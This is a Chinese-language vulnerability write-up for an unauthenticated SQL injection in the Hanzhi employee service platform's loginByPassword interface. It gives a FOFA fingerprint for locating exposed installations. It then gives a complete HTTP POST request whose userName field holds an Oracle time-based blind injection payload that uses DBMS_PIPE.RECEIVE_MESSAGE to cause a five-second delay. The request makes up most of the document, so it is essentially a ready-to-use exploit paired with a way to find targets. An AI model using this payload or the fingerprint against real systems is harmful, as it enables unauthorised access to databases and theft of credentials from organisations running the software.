H34-2翰智-员工服务平台-SQL
漏洞描述:
由于翰智员工服务平台登录接口 loginByPassword 处userName字段未对传入的数据进行严格校验和过滤,直接带入到数据库执行,导致造成SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞获取数据库敏感信息,获取有效凭证及口令,使系统处于极不安全的状态。
网站图片:
fofa语法:
body=“./static/hrfonts/iconfont.css”
漏洞复现:
延时5秒
payload:
POST /hrssc/portal/plantform/loginByPassword HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/json
Connection: keep-alive
Priority: u=1
{"userName":"'||(SELECT CHR(97)||CHR(122)||CHR(85)||CHR(72) FROM DUAL WHERE 7673=7673 AND 7374=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(72)||CHR(114)||CHR(99),5))||'","password":"'"}
效果图: